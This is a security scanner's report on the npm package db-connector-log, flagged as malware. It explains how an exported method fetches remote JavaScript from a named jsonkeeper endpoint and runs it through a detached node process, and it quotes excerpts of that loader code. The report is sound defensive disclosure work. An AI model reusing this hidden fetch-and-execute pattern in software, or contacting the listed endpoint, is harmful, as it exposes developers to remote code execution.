
db-connector-log@1.0.1

A database connector class that simplifies connections and queries to a database for nodejs apps

AI Security Review

scanned 3d ago · by lpm-firewall-ai

The package exposes a database connector class with an extra method that fetches a remote payload and runs it in a detached Node process. This creates user-triggered remote code execution outside the package's stated database connector purpose.

Static reason: High-risk behavior combination matched malicious policy.
Trigger: Runtime call to `queryDBConnect()` on the exported class.
Impact: Arbitrary remote code can run in the consuming project environment with the caller's privileges.
Mechanism: Fetch remote JavaScript and execute it via the stdin of a detached `node` process.
Attack narrative: When a consumer imports the main entrypoint and calls `queryDBConnect()`, index.js decodes a base64-encoded URL, requests `https://jsonkeeper.com/b/SH5ZW`, extracts `.data.session` from the response, starts a detached `node` process, and writes that remote content to the child process's stdin. This behavior has nothing to do with a MySQL connector and enables arbitrary, remotely controlled code execution.
Rationale: Direct source inspection confirms a hidden remote payload execution path in index.js that is unrelated to the package's stated purpose. Although it is not triggered at install time, the exported runtime method is concrete malicious behavior that warrants blocking.
Evidence: package.json, index.js, test.js
Network endpoints (1): jsonkeeper.com/b/SH5ZW

Decision evidence

public snapshot
AI called this Malicious at 97.0% confidence as Malware with low false-positive risk.
Evidence for block
  • index.js imports axios and child_process.spawn at package entrypoint.
  • index.js queryDBConnect decodes base64 URL and GETs remote data.session.
  • index.js queryDBConnect spawns detached `node` with stdio pipe and writes remote `session` into stdin.
  • Remote code execution helper is unrelated to normal MySQL connector behavior.
  • package.json declares main index.js and no lifecycle hooks.
Evidence against
  • No install-time lifecycle script in package.json.
  • Malicious behavior is method-triggered, not automatic on import.
  • Other connector methods perform expected mysql pool/query/transaction operations.
Behavioral surface
Source: ChildProcess, EnvironmentVars, Network
Supply chain: HighEntropyStrings
Manifest: No manifest risk signals triggered.
scanned 2 file(s), 19.2 KB of source

Source & flagged code

4 flagged
index.js
Critical
Spawned Remote Code Execution

Source spawns a local helper that fetches and dynamically executes remote code.

index.js · L2
Excerpt (line numbers are those of the scanned index.js):
  L2:   const util = require("util");
  L3:   const axios = require("axios");
  L4:   const { spawn } = require("child_process");
  L5:   /**
  ...
  L28:  "ssl": {
  L29:    ca: "Contents of __dirname + '/certs/ca.pem'",
  L30:    key: "Contents of __dirname + '/certs/client-key.pem'",
  ...
  L270: const HASH_KEY = "[redacted]";
  L271: const s1 = (await axios.get(atob(HASH_KEY))).data.session;
  L272: ...
  L276: });
  L277: child.stdin.write(s1);
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

index.js · L2
Trigger-reachable chain: manifest.main -> index.js (same index.js excerpt as the first finding: L2-L5, L28-L30, L270-L277)
High
Child Process

Package source references child process execution.

index.js · L3
Excerpt (line numbers are those of the scanned index.js):
  L3:   const axios = require("axios");
  L4:   const { spawn } = require("child_process");
  L5:   /**
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

index.js · L2
(same index.js excerpt as the first finding: L2-L5, L28-L30, L270-L277)

Findings

2 Critical, 2 High, 3 Medium, 2 Low
Critical: Spawned Remote Code Execution (index.js)
Critical: Trigger Reachable Dangerous Capability (index.js)
High: Child Process (index.js)
High: Base64 Obscured Url (index.js)
Medium: Network
Medium: Environment Vars
Medium: Structural Risk Force Deep Review
Low: Scripts Present
Low: High Entropy Strings